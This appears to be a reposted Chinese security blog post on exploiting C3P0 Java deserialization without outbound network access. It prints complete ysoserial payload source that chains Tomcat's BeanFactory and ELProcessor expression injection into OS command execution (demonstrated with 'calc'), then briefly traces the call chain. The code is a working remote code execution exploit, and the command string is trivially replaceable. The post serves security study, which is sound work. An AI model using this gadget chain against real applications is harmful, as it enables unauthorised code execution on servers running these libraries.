[Java安全]C3P0反序列化不出网利用学习

Posted Y4tacker

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[Java安全]C3P0反序列化不出网利用学习相关的知识,希望对你有一定的参考价值。

参考文章

本文复现了雨了个雨师傅的文章,思路很好,看完以后其实和JNDI8u191后的绕过思路一致,这个等下再复现学习

利用链构造

在昨天看了Ysoserial的基本过程以后其实这个就相对简单了,不一样的地方就是后面Ysoserial用了URLClassLoader,而这个是当前线程下的ClassLoader,曾经一直觉得没用,还是自己学的太少了,大佬想到通过Tomcat的getObjectInstance方法调用ELProcessor的eval方法实现表达式注入

package ysoserial.payloads;


import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;

import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;

import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;

import org.apache.naming.ResourceRef;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/**
 yulegeyu modified
 */
@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-java:0.2.11"} )
@Authors({ Authors.MBECHLER })
public class C3P0Tomcat implements ObjectPayload<Object> {
    public Object getObject ( String command ) throws Exception {

        PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
        Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource("org.apache.naming.factory.BeanFactory", null));
        return b;
    }

    private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {

        private String className;
        private String url;

        public PoolSource ( String className, String url ) {
            this.className = className;
            this.url = url;
        }

        public Reference getReference () throws NamingException {
            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
            ref.add(new StringRefAddr("forceString", "x=eval"));
            String cmd = "calc";
            ref.add(new StringRefAddr("x", "\\"\\".getClass().forName(\\"javax.script.ScriptEngineManager\\").newInstance().getEngineByName(\\"javascript\\").eval(\\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','"+ cmd +"']).start()\\")"));
            return ref;
        }

        public PrintWriter getLogWriter () throws SQLException {return null;}
        public void setLogWriter ( PrintWriter out ) throws SQLException {}
        public void setLoginTimeout ( int seconds ) throws SQLException {}
        public int getLoginTimeout () throws SQLException {return 0;}
        public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
        public PooledConnection getPooledConnection () throws SQLException {return null;}
        public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}

    }


    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(C3P0Tomcat.class, new String[]{"calc"});
    }

}

利用链分析

有些细节就不扣了,在Ysoserial那篇分析过了,简单来跟踪下调用链,PoolBackedDataSourceBasereadObject
首先第一个恢复出的对象ReferenceSerializedIndirectlySerialized的实例

跟进getObject的调用,继续跟进referenceToObject

不同于之前,这次我们让var11null

这里实例化了org.apache.naming.factory.BeanFactory

就入上面所说的
org.apache.naming.factory.BeanFactorygetObjectInstance()中会通过反射的方式实例化Reference所指向的任意Bean Class,并且会调用setter方法为所有的属性赋值。
而该Bean Class的类名、属性、属性值,全都来自于Reference对象,均是攻击者可控的

反射调用

可以看到这里成功触发

以上是关于[Java安全]C3P0反序列化不出网利用学习的主要内容,如果未能解决你的问题,请参考以下文章

[Java安全]C3P0反序列化不出网利用学习

fastjson-BCEL不出网打法原理分析

[Java安全]Java反序列化C3P0之利用URLClassLoader

[Java安全]Java反序列化C3P0之利用URLClassLoader

[Java安全]Java反序列化C3P0之利用URLClassLoader

6-java安全——java反序列化漏洞利用链